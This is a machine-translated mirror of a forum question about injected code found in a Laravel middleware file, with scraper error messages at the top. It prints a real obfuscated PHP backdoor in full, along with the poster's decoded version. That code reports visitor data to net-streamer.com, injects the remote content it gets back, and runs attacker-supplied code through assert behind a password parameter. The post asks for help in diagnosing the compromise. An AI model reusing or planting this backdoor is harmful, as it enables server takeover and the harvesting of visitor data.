Warning: file_get_contents(/data/phpspider/zhask/data//catemap/0/laravel/11.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181
Php 服务器上添加的新代码位于laravel框架文件中,该文件导致错误_Php_Laravel_Server_Web Deployment_Backend - Fatal编程技术网
Fatal编程技术网
  • php/
  • Php 服务器上添加的新代码位于laravel框架文件中,该文件导致错误

Php 服务器上添加的新代码位于laravel框架文件中,该文件导致错误

php laravel server

Php 服务器上添加的新代码位于laravel框架文件中,该文件导致错误,php,laravel,server,web-deployment,backend,Php,Laravel,Server,Web Deployment,Backend,我在为一个客户做一个项目。在服务器上完成并上传了几天后,我的客户机向我显示发生了错误。当我检查这些文件时,我发现在checkformintenancemode.php文件中添加了一段额外的代码 供应商/laravel/framework/Illumb/foundation/http/middleware 那是 //###==### error_reporting(0); $strings = "as";$strings .= "sert"; @$strings(str_rot13('r

我在为一个客户做一个项目。在服务器上完成并上传了几天后,我的客户机向我显示发生了错误。当我检查这些文件时,我发现在checkformintenancemode.php文件中添加了一段额外的代码

供应商/laravel/framework/Illumb/foundation/http/middleware

那是

    //###==###
error_reporting(0); 
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr("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"));'));
//###==###
经过一些基本的解码后,我发现下面的代码是

if (isset($ibv))
{
    echo $ibv;
}
else
{
    if(!empty($_COOKIE["client_check"]))die($_COOKIE["client_check"]);

    if(!isset($c_["HTTP_ACCEPT_CHARSET"]))
    {
        $temp = dirname(__FILE__)."/ch";$charset = file_get_contents($temp);
        if (!$charset  && !isset($_GET["charset"]))
        {
            $str = file_get_contents("http://".$_SERVER["HTTP_HOST"]."/?charset=1");
            if(preg_match("/windows-1251/i", $str)){$charset = "windows-1251";
            }
            elseif(preg_match("/utf-8/i", $str))
            {
                $charset = "utf-8";
            }
            else
            {
                $charset = "windows-1251";
            }
            $handle = fopen($temp, "w+");
            fwrite($handle, $charset);
            fclose($handle);
        }
        else
        {
            $charset = "utf-8";
        }
        $c0 = $charset;
    }
    else
    {
        $c0=$c_["HTTP_ACCEPT_CHARSET"];
    }
    if(function_exists("curl_init"))
    {
        $c1=curl_init("http://net-streamer.com/get.php?d=".urlencode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"])."&u=".urlencode($_SERVER["HTTP_USER_AGENT"])."&c=".$c0."&i=1&ip=".$_SERVER["REMOTE_ADDR"]."&h=".md5("069a5edfc9e75c4abf03b0608636fe46".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"].$_SERVER["HTTP_USER_AGENT"].$c0."1"));
        curl_setopt($c1,42,false);
        curl_setopt($c1,19913,true);
        $ibv =  curl_exec($c1);
        curl_close($c1);
    }
    elseif(ini_get("allow_url_fopen")==1)
    {
        $ibv = file_get_contents("http://net-streamer.com/get.php?d=".urlencode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"])."&u=".urlencode($_SERVER["HTTP_USER_AGENT"])."&c=".$c0."&i=1&ip=".$_SERVER["REMOTE_ADDR"]."&h=".md5("069a5edfc9e75c4abf03b0608636fe46".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"].$_SERVER["HTTP_USER_AGENT"].$c0."1"));
    }
    if (isset($ibv))
    {
        echo $ibv;
    }
    if(isset($_REQUEST["p"]) && $_REQUEST["p"] == "85bc6cfb")
    {
    @assert($_REQUEST["c"]);
    }

}
但我不明白它的作用和原因。我还看到在public/index.php中添加了相同的类型代码

有人能告诉我为什么要添加它以及它的作用吗?

这是ping net-streamer.com,提供了一系列关于您网站的详细信息。可能是广告垃圾软件/间谍软件。但它是如何自动添加的?客户否认了任何其他人对代码进行篡改的事实。不知道。这类事情对于这个网站来说是离题的。这个网站是为了解决编程问题,而不是弄清楚你的服务器是如何/是否被黑客攻击的。同意@MarcB。这是一个更好的适合。服务器可能已被黑客入侵。